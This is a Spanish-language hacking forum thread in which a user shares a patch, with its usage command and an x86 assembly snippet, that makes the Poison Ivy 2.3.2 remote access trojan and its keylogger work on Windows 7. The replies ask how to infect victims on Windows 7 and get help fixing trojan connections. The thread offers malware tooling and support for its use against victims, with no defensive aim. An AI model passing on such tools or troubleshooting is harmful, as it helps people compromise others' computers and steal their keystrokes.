Indetectables

[Enlace externo eliminado para invitados] ... ormat=html

Bien. A este post lo traje de un foro el cual modero. Aca les dejo el link:
Fue posteado por un Moderador Global, Y fue analizado.
El archivo dwwin.exe que dice el anubis es una aplicación incluida en windows xp llamda Microsoft Doctor Watson, esta aplicación solo se encarga de recopilar información acerca de los errores de windows y enviar informes de error.

Aca una imagen de como se usa



ANTRAX

para que funcione infectando ah un windows seven el cleinte corre perfecto en todos los so

J46 escribió:perdonad pero tengo una duda.. este patch que es para poder utilizar poison con windows 7 ? o para q funcione infectando una victima con w7 ?

Una pregunta. El parches es que funcione en Windows 7 y para que también levante información el keylogger? Porque de ser así quizás funcione el keylogger también en vista.

De maravilla, poison se te extrañaba ya en windows 7, jejejejej!!!!

Ignaro mayor de BsAS escribió:Una pregunta. El parches es que funcione en Windows 7 y para que también levante información el keylogger? Porque de ser así quizás funcione el keylogger también en vista.

Si, es asi como decis. Es para que funcione el keylogger en 7

Hola, se me dio por probar pi en win7 y no me funciona, alguien sabe porque puede ser?

saludos

No te funciona el troyano o no te funciona el keylogger?

ANTRAX escribió:

Mirando por ahi encontre esto. Es un parche para Poison Ivy 2.3.2 para que funcione y sea compatible con Windows 7.
espero que les sea de su agrado

This patch the Poison ivy server for run in windows 7 :P

Use:

PATCHPI.exe -f %s

[Enlace externo eliminado para invitados]

Código: Seleccionar todo

/*400274*/  XOR BYTE PTR DS:[EAX],AL
/*400276*/  ADD BYTE PTR DS:[EAX],AL
/*400278*/  MOV ESI,DWORD PTR DS:[ESI+C]
/*40027B*/  MOV ESI,DWORD PTR DS:[ESI+1C]
/*40027E*/  MOV EDX,DWORD PTR DS:[ESI+8]
/*400281*/  MOV EDI,DWORD PTR DS:[ESI+20]
/*400284*/  MOV ESI,DWORD PTR DS:[ESI]
/*400286*/  CMP DWORD PTR DS:[EDI+C],320033
/*40028D*/  JNZ SHORT LOCALHOS.0040027E
/*40028F*/  MOV DWORD PTR SS:[EBP-4C1],EDX
/*400295*/  RETN

By SecMAM

thnks Hacker_Zero

ANTRAX

Bro si te pudieras hacer un video tutorial se agradeceria mucho

y asi te evitarias tantas preguntas de users

saludos y exelente aporte

Me eh quedado abrumado :) chido eh

Exelente
Muchas gracias por el aporte

ANTRAX escribió:No te funciona el troyano o no te funciona el keylogger?

el troyano!

this patch not work 64 bit win7 ,,and work 32 bit win7 but not connected restart server because poison not support hklm run users in ?nstall server part in rat........:(

luchy78ar escribió:

ANTRAX escribió:No te funciona el troyano o no te funciona el keylogger?

el troyano!

El troyano en si, si conecta en vista y en seven, solo que funciona mal. y con este parche lo haces funcional. Revisa bien las configuraciones que has puesto

gracias antrax por el aporte lo probare aver que tal saludos y gracias